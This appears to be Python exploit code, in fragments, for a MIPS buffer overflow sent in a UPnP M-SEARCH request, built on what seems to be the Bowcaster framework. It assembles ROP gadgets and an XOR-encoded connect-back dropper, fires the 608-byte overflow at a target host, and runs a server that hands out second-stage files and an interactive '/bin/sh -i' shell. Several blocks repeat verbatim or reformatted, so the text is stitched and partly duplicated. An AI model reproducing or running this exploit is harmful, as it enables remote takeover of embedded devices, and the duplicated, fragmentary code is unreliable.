    search_value=sys.argv[1]
    if search_value.startswith("0x"):
        value=int(search_value,16)
    offset=buf.find_offset(value)
    if(offset < 0):
        print "Couldn't find value %s in the overflow buffer." % search_value
    else:
        print "Found value %s at\noffset: %d" % (search_value,offset)
    exit(0)

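# --- target selection ---------------------------------------------------------
# usage: <script> <target_addr> <target_port>
# (the single-argument offset-search mode above exits before reaching here)
if len(sys.argv) < 3:
    sys.exit("usage: %s <target_addr> <target_port>" % sys.argv[0])
addr = sys.argv[1]
port = int(sys.argv[2])

# Files the connect-back server hands out once the payload calls home, and the
# interactive shell it starts for the operator.  CALLBACK_IP must be an address
# the target can actually reach, otherwise the payload never connects back.
files_to_serve = ["./stage2dropper", "./helloworld"]
server = TrojanServer(CALLBACK_IP, files_to_serve, connectback_shell=True, startcmd="/bin/sh -i")
# serve() appears to background the server and return a pid (falsy on failure)
# -- TODO confirm against TrojanServer.
pid = server.serve()
# Give the server a moment to start listening before the exploit fires.  A fixed
# sleep is a race, not a guarantee, on a slow host.
time.sleep(1)
if pid:
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((addr, port))
            logger.LOG_INFO("sending exploit.")
            # sendall(): a plain send() may deliver only a prefix of the overflow
            # buffer, which silently breaks the exploit.
            sock.sendall(str(buf))
        finally:
            # release the socket on the error path too, not only after a
            # successful send
            sock.close()
        # block until the connect-back session is over
        server.wait()
    except Exception as e:
        # log the actual failure; without it the operator has no idea whether
        # the connect, the send or the wait went wrong
        logger.LOG_WARN("Failed to connect: %s" % e)
        # the kill itself is expected to follow (not shown here) -- TODO confirm
        logger.LOG_WARN("Failed to connect. Killing connect-back server.")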
    search_value=sys.argv[1]
    if search_value.startswith("0x"):
        value=int(search_value,16)
    offset=buf.find_offset(value)
    if(offset < 0):
        print "Couldn't find value %s in the overflow buffer." % search_value
    else:
        print "Found value %s at\noffset: %d" % (search_value,offset)
    exit(0)

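# --- target selection ---------------------------------------------------------
# usage: <script> <target_addr> <target_port>
# (the single-argument offset-search mode above exits before reaching here)
if len(sys.argv) < 3:
    sys.exit("usage: %s <target_addr> <target_port>" % sys.argv[0])
addr = sys.argv[1]
port = int(sys.argv[2])

# Files the connect-back server hands out once the payload calls home, and the
# interactive shell it starts for the operator.  CALLBACK_IP must be an address
# the target can actually reach, otherwise the payload never connects back.
files_to_serve = ["./stage2dropper", "./helloworld"]
server = TrojanServer(CALLBACK_IP, files_to_serve, connectback_shell=True, startcmd="/bin/sh -i")
# serve() appears to background the server and return a pid (falsy on failure)
# -- TODO confirm against TrojanServer.
pid = server.serve()
# Give the server a moment to start listening before the exploit fires.  A fixed
# sleep is a race, not a guarantee, on a slow host.
time.sleep(1)
if pid:
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((addr, port))
            logger.LOG_INFO("sending exploit.")
            # sendall(): a plain send() may deliver only a prefix of the overflow
            # buffer, which silently breaks the exploit.
            sock.sendall(str(buf))
        finally:
            # release the socket on the error path too, not only after a
            # successful send
            sock.close()
        # block until the connect-back session is over
        server.wait()
    except Exception as e:
        # log the actual failure; without it the operator has no idea whether
        # the connect, the send or the wait went wrong
        logger.LOG_WARN("Failed to connect: %s" % e)
        # the kill itself is expected to follow (not shown here) -- TODO confirm
        logger.LOG_WARN("Failed to connect. Killing connect-back server.")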
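################################################################################
# locate stack. add 0x48+var_30+$sp into $s5, jalr $s6
################################################################################
# gadget_section(buffer offset, gadget address, description) -- the first
# argument looks like the offset inside the overflow buffer at which the
# address is placed; TODO confirm against SC.gadget_section.
section = SC.gadget_section(240, 0x328F4, description="add offset from $sp into s5, jalr $s6")


################################################################################
# jump into stack. jalr $s5.  This needs to get loaded into the stackfinder's jalr reg
################################################################################
section = SC.gadget_section(
    192, 0x1B1F4, description="Jump into stack via reg $s5. make sure the stackfinder jumps to this gadget."
)

# Port the connect-back server listens on.  The dropper payload is built with
# the same value, so it lives in one place: a mismatch would leave the payload
# calling back to a port nothing listens on, and the exploit would fail
# silently.
CALLBACK_PORT = 8080

# Files the connect-back server hands out once the payload calls home, and the
# interactive shell it starts for the operator.
files_to_serve = ["./stage2", "./tk.tar.gz"]

connectback_server = TrojanServer(CALLBACK_IP, files_to_serve, port=CALLBACK_PORT, startcmd="/bin/sh -i", connectback_shell=True)
payload = TrojanDropper(CALLBACK_IP, BigEndian, port=CALLBACK_PORT)

# NUL is the only byte excluded.  The M-SEARCH request is a text protocol, so
# other bytes (CR/LF, whitespace) may also be unsafe -- TODO confirm against
# the target's parser before relying on this.
encoded_payload = MipsXorEncoder(payload, badchars=["\0"])

SC.string_section(268, encoded_payload.shellcode, description="connect back payload")


# 608-byte overflow buffer assembled from the sections registered above
buffer_overflow_string = OverflowBuffer(BigEndian, 608, SC.section_list)

pretty_msearch = msearch_crash.MsearchCrash(buffer_overflow_string.pretty_string())

# single-argument print is valid under both Python 2 and Python 3
print("\n\n" + str(pretty_msearch) + "\n\n")


msearch_string = msearch_crash.MsearchCrash(buffer_overflow_string)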
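################################################################################
#jump into stack. jalr $s5.  This needs to get loaded into the stackfinder's jalr reg
################################################################################
# gadget_section(buffer offset, gadget address, description) -- the first
# argument looks like the offset inside the overflow buffer at which the
# address is placed; TODO confirm against SC.gadget_section.
section = SC.gadget_section(
    192,
    0x1B1F4,
    description=
    "Jump into stack via reg $s5. make sure the stackfinder jumps to this gadget."
)

# Port the connect-back server listens on.  The dropper payload is built with
# the same value, so it lives in one place: a mismatch would leave the payload
# calling back to a port nothing listens on, and the exploit would fail
# silently.
CALLBACK_PORT = 8080

# Files the connect-back server hands out once the payload calls home, and the
# interactive shell it starts for the operator.
files_to_serve = ["./stage2", "./tk.tar.gz"]

connectback_server = TrojanServer(CALLBACK_IP,
                                  files_to_serve,
                                  port=CALLBACK_PORT,
                                  startcmd="/bin/sh -i",
                                  connectback_shell=True)
payload = TrojanDropper(CALLBACK_IP, BigEndian, port=CALLBACK_PORT)

# NUL is the only byte excluded.  The M-SEARCH request is a text protocol, so
# other bytes (CR/LF, whitespace) may also be unsafe -- TODO confirm against
# the target's parser before relying on this.
encoded_payload = MipsXorEncoder(payload, badchars=['\0'])

SC.string_section(268,
                  encoded_payload.shellcode,
                  description="connect back payload")

# 608-byte overflow buffer assembled from the sections registered above
buffer_overflow_string = OverflowBuffer(BigEndian, 608, SC.section_list)

pretty_msearch = msearch_crash.MsearchCrash(
    buffer_overflow_string.pretty_string())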